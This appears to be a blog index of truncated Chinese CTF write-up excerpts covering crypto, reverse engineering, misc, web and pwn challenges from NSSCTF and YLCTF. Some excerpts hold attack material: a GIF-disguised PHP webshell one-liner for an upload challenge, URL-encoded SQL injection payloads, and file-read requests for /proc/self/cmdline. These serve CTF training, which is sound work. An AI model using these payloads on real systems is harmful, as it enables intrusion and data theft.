2024年NSSCTF秋季招新赛(校外赛道) Crypto Aftermath 题目 让我们把CRYPTO烧成灰 from Crypto.Util.number import getPrime, inverse, long_to_bytes, bytes_to_long from sympy import gcd key_size = 1024 p = getPrime(key_size //
Babyre 简单看main函数的话,我感觉像是一个要在一定时间内解答的程序,但在运行过程中发现没什么关系,去看一眼xor_string(Buffer)里面的东西 不得不说这个代码阅读起来还是有一些艰难的,有很多无意义的定义,尝试写脚本,看的出来是把输入的长度为46的flag分成两个部分,前部分是加密异或,后一部分是由前往后推异或,直接写的时候,从比较简单的第一段flag看出来和大小端序有问题,
MISC EZ_ZIP 图片分离得到压缩包。里面是一个嵌套压缩包,让GPT搓一个脚本 import zipfile import os import shutil # 设置初始压缩包名 current_zip = '00000017.zip' save_directory = 'extracted_file' # 设置保存最里面文件的目录 # 创建保存目录 if not os.path.ex
WEB babyupload 传.htaccess和一个马就行 GIF89a <?=`$_POST[1]`; RedFlag import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.getenv('FLAG') @app.route('/') def index(): return o
MISC FindYourWindows 题目拿到两个文件:密钥文件和磁盘镜像文件 使用磁盘解密的常用工具VeraCrypt进行镜像的挂载,并且使用指定keyfile进行解密,挂载到任意空闲的驱动器号中: 挂载成功后,就能像正常访问Windows文件管理器一样,进行简单的文件翻找,没有发现flag 使用WinHex打开磁盘驱动器,可以看到有关磁盘的相关信息 考虑到flag字符串的格式,直接在W
week2 LovePopChain 源码如下 <?php class MyObject{ public $NoLove="Do_You_Want_Fl4g?"; public $Forgzy; public function __wakeup() { if($this->NoLove == "Do_You_Want_Fl4g
flow 题目给了一个读文件功能先读一下执行的命令 ?file=/proc/self/cmdline 得到python3/app/main.py 那么直接读源码 ?file=/app/main.py 源码如下 from flask import Flask, request, render_template_string, abort app = Flask(__name__) HOME
sInXx 访问题目首页,发现为一个员工查询的小功能,猜测考点应该是 SQL 注入,该位置应该存在SQL命令的拼接,利用 payload :juan79%27%09and%09%281%3D1%29%23,页面存在回显 然后通过测试发现过滤了逗号 可以用join连接表测试列数 1'%09UNION%09SELECT%09*%09FROM%09((SELECT%091)A%09join%09(
week3虽然只有三题,相对来说难度还是可以的 Shellcode-lv2 保护全开了 开了一个可执行的区域,但是只允许读入16个字节 开启了沙箱,只能够使用orw,syscall也禁用了 只能去控制程序自己的寄存器了,要不然的话位置是不够的,所以先清空程序的寄存器,然后再去读 #!/bin/env python3 from pwn import * context(log_level='de
2024-源鲁杯 [Round2] [Round 2] 三点几啦饮茶先 flag: YLCTF{84ec2ee8-403e-42ae-9d52-76de28c8d13c} 简单魔改tea from ctypes import * enc = [0x72093D7C, 0xB60BF47D] key = [0x1001, 0x2002, 0x3003, 0x4004] for i in ran
源鲁杯ROUND2 Pwn方向全部题解 shortshell vuln函数读入5字节的shellcode然后执行 题目中有backdoor 所以直接jmp到backdoor即可 from pwnlib.util.packing import u64 from pwnlib.util.packing import u32 from pwnlib.util.packing import u16
YLCTF2024 ROUND3 crypto 全 QWQ 题目 分析 aaEncode编码,将文本转成了颜文字,使用在线网站解密即可,得到字符LFGEGVCGPNUEA5RTL5DHK3S7O4YXI2C7ORUGSNK7M5QW2M27KFLVC7I= base32解码得到FALG ezlcg 题目 class LCG(object): def __init__(self, see
The Beginning 题目描述:梦开始的地方 题目页面: 想右击查看网页源代码,但是发现不行 这时按F12 发现flag 在url前面加view-source也可以查看网页源代码 http标头 题目描述:web签到 题目页面: 点击开始挑战 题目要求:要在发售第一时间凌晨0点0时0分才能进下一关(注意date格式) 这个题应该是考察http报文的知识点 用burp抓包改包 在报文
Cmnts 源代码 <?php include 'flag.php'; parse_str($_SERVER['QUERY_STRING']); if (isset($pass)) { $key = md5($pass); } if (isset($key) && $key === 'a7a795a8efb7c30151031c2cb700ddd9') {
原理 离散余弦变换(DCT for Discrete Cosine Transform)是与傅里叶变换相关的一种变换,它类似于离散傅里叶变换,但是只使用实数。离散余弦变换相当于一个长度大概是它两倍的离散傅里叶变换,这个离散傅里叶变换是对一个实偶函数进行的(因为一个实偶函数的傅里叶变换仍然是一个实偶函数),在有些变形里面需要将输入或者输出的位置移动半个单位(DCT有8种标准类型,其中4种是常见的)。